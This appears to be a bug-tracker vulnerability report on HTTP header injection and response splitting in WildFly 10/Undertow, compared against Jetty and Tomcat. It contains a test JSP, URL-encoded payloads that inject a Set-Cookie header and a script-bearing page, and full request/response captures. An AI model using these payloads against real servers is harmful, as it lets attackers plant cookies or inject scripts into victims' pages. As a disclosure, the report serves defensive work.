NOTE: The following discussion mentions Spring specifically however one can exploit using jsp.
Internal RH testing was based on the following jsp
<%
if (request.getParameter("WELCOME") == null)
{
out.println("Please enter the welcome string");
}
else
{
out.println("Hello <b>"+request. getParameter("WELCOME")+"</b>!");
}
%>
With the following payload
http://localhost:8080/Test1.war/?WELCOME=language=en%0A%0A%3Chtml%3E%3Cscript%3Ealert(123)%3C/script%3E%3Cbody%3E%3Ch1%3EWelcome!%3C/h1%3E%3C/body%3E%3C/html%3E%3C!
Now the specific report:
========================
WildFly/Undertow vulnerable to HTTP header injection/Response Splitting
-----------------------------------------------------------------------
The WildFly 10.0.0 Application Server/Undertow web server is vulnerable to the injection of arbitrary HTTP headers, and also Response Splitting, due to insufficient sanitisation and validation of user input before the input is used as part of a HTTP header value.
The PoC described below was derived from code at: http://www.mkyong.com/spring-mvc/spring-mvc-internationalization-example. [Open URL] The code was packaged as a .war file (apart from Jetty) and hosted directly on the following servlet engines for comparison:
- Jetty 9.2.11.v20150529
- Tomcat 8.0.35
- WildFly 10.0.0.Final
The pom.xml file used in the actual PoC is shown at the bottom of this document
Systems affected:
-----------------
WildFly AS 10.0.0.Final / Undertow 1.3.15.Final
Host machine:
-------------
Linux ubuntu 3.16.0-71-generic #92~14.04.1-Ubuntu SMP Thu May 12 23:31:46 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.4 LTS"
Description
-----------
Using a simple Spring MVC web application as a PoC (original here: http://www.mkyong.com/spring-mvc/spring-mvc-internationalization-example), [Open URL] it was observed that the WildFly Application Server/Undertow does not sanitise or strip newline characters before using them as part of a HTTP header. This behavior is in contrast to other JSP servlet engines tested with the same PoC code (currently Jetty 9.2.11.v20150529 and Tomcat 8.0.35), where the newline characters are removed and it is not possible to split or inject headers.
In the case of the PoC the org.springframework.web.servlet.i18n.LocaleChangeInterceptor is used to set a header value to that of a user supplied input, to determine the language of the page and the correct internationalization message to display.
Using newline characters injected into the HTTP headers, it is possible for the malicious user to add arbitrary headers such as Set-Cookie to set arbitrary cookies, or potentially use a Location header for an open-redirect. By using two newline characters the attacker can 'split' the response (HTTP Response Splitting) and provide their own content that will be rendered to the victim user.
Payloads:
---------
Set-Cookie payload - en%0ASet-Cookie:MyCookieValue
GET http://127.0.0.1:8888/SpringMVC/welcome.htm?language=en%0ASet-Cookie:MyCookieValue [Open URL] HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: JSESSIONID=jMNTfT-G_4QIwx8keYJtrFfmskg_Y6-lgQVuBlCx.ubuntu; __utma=96992031.883573134.1464252632.1464252632.1464252632.1; __utmz=96992031.1464252632.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Connection: keep-alive
Host: 127.0.0.1:8888
HTTP/1.1 200 OK
Connection: keep-alive
X-Powered-By: Undertow/1
X-Powered-By: JSP/2.3
Server: WildFly/10
Content-Type: text/html;charset=UTF-8
Content-Length: 290
Content-Language: en
set-cookie: mycookievalue-
Date: Fri, 03 Jun 2016 15:44:10 GMT
Response Splitting payload - en%0A%0A%3Chtml%3E%3Cscript%3Ealert(123)%3C/script%3E%3Cbody%3E%3Ch1%3EWelcome!%3C/h1%3E%3C/body%3E%3C/html%3E%3C!--
GET http://127.0.0.1:8888/SpringMVC/welcome.htm?language=en%0A%0A%3Chtml%3E%3Cscript%3Ealert(123)%3C/script%3E%3Cbody%3E%3Ch1%3EWelcome!%3C/h1%3E%3C/body%3E%3C/html%3E%3C!-- [Open URL] HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: mycookievalue-; JSESSIONID=jMNTfT-G_4QIwx8keYJtrFfmskg_Y6-lgQVuBlCx.ubuntu; __utma=96992031.883573134.1464252632.1464252632.1464252632.1; __utmz=96992031.1464252632.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Connection: keep-alive
Host: 127.0.0.1:8888
HTTP/1.1 200 OK
Connection: keep-alive
X-Powered-By: Undertow/1
X-Powered-By: JSP/2.3
Server: WildFly/10
Content-Type: text/html;charset=UTF-8
Content-Length: 341
Content-Language: en